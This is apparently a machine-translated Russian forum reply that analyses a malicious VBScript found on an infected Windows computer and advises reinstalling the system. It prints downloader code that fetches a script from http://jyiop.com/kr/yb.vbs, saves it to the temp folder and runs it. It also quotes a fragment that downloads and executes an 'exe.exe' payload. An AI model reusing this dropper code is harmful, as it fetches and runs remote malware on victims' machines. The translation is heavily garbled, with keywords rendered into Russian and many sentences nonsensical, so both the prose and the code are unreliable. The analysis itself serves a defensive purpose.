Я не охотно готов пойти далеко как раскрывать вебсайт, котор вы упомянули однако, от сценариев выше здесь я вижу…
Сценарий 1 создает пустой архив, соединения к вебсайт и загрузкам содержание страницы и сбросы оно в пустой архив. Этот архив сохранен как «yb.vbs» и предполагаем исполнить.
-------------------------------------------------------------------
B= " yb.vbs "
С CreateObject («MSXML2.XMLHTTP
»)
.open «ПОЛУЧАЮТ», «
http://jyiop.com/kr/yb.vbs», ложное
.send ()
Установите a = CreateObject («Scripting.FileSystemObject
»)
Установите d = A.CreateTextFile (A.GetSpecialFolder
(
2) + «\» + b)
D.WriteLine .responseText
Конец с
D.Close
CreateObject («WScript.Shell
»). Побегите A.GetSpecialFolder (2) +» \ «+ b
-------------------------------------------------------------------
Раздел 2 теперь, когда был создан архив vbs и бег, он пытается посетить другой webpage но это время сохраняет содержание страницы стержня в вызванный архив «exe.exe». Этот новый архив должен быть сохраненным в скоросшиватель temp потребителей.
Сценарий после этого бежит архив «exe.exe».
По мере того как вы упомянули, taskkill останавливает Шиндошс Медиа Плаыер - почему, которое знает?!?!
Сценарий после этого уничтожает сценарий vb раздел 1 создал (сценарий в настоящее время бежит).
Будет второе ожидание 3 после этого, котор архив «exe.exe» уничтожен.
Эта часть;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Если c.Status = x после этого
u=c.ResponseBody: d.Open: d.Type
= y: d.Write u: d.SaveToFile b: d.Close]
сценарий печатая на машинке для того чтобы раскрыть архив будет течь в webpage - ничего сделать с Adobe. «c.Status» - сценарий ждет webpage для того чтобы быть готов и приспособлен загружать. «u=c.ResponseBody» принимает страницу стержня и впихывает ее в перемеююый. Поток раскрын и текст загружан в перемеююый. Сохранен и закрын архив. В этом сценарии webpage/архив сохранены в скоросшиватель temp как «exe.exe».
Реальная опасность что архив «exe.exe». Как только она бежалась, не говорить оно было конструировано для того чтобы сделать.
Тот компьютер все еще заражен с вирусом. Программа «exe.exe» smogла загружать другие вирусы в предпосылке для того чтобы воспрепятствовать развертки системы. Факт что вы можете увидеть окно командование открытое и сценарий попытаны для того чтобы побежать говорят мне будет некоторый злостый архив все еще медля.
Может быть временем оценить что потребности быть сохраненным от той машины и начните afresh с заново устанавливать Windows и применений. Оно звучает драматически но видящ по мере того как антивирус не обнаруживает что-нибыдь из видов я думайте вы с точки зрения никакого возвращения. Вспомните то покуда злостое Кодий дальше там, любое управляйте; оно ручка памяти USB, камера etc., может потенциальн содержать вирус/троянец, если оно было прикреплен к машине.
